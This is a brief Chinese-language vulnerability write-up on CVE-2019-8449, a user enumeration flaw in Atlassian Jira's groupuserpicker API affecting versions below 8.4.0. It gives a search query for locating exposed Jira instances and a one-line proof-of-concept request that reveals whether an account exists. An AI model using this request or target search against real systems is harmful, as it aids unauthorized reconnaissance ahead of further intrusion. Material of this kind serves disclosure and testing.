# Atlassian Jira groupuserpicker 用户信息枚举漏洞 CVE-2019-8449

## 漏洞描述

Atlassian Jira groupuserpicker接口存在用户信息枚举漏洞，攻击者通过漏洞可以获取应用中的使用者账户名称，来进行进一步渗透

## 漏洞影响

```
Atlassian Jira <8.4.0
```

## 网络测绘

```
app="ATLASSIAN-JIRA"
```

## 漏洞复现

登录页面

![](images/202205241426135.png)验证POC

```
/rest/api/latest/groupuserpicker?query=admin&maxResults=50&showAvatar=false
```

当用户存在时

![](images/202205241426482.png)

当用户不存在时

![](images/202205241427885.png)